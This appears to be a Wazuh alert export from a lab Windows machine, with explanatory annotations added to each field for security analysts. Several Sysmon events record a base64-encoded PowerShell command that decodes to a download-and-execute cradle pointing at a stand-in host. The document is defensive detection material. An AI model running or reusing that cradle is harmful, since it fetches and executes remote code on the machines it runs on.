data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8756 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534213.942369 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:44.8784134Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282170 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:44.876
ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00}
ProcessId: 11892
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yefpwlal.rop.ps1
CreationUtcTime: 2025-04-24 22:35:44.876
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:44.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcbf-680a-a90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yefpwlal.rop.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:44.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.945137 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:45.9124642Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282194 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:45.401
ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00}
ProcessId: 8908
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00}
ParentProcessId: 11892
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:45.401 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.953203 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:46.0795400Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282195 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:46.051
ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00}
ProcessId: 8908
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_toe2blgg.cdx.ps1
CreationUtcTime: 2025-04-24 22:35:46.051
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:46.051 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_toe2blgg.cdx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:46.051 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.955967 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:47.1449849Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43824 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.963303 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:47.3006529Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2990 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
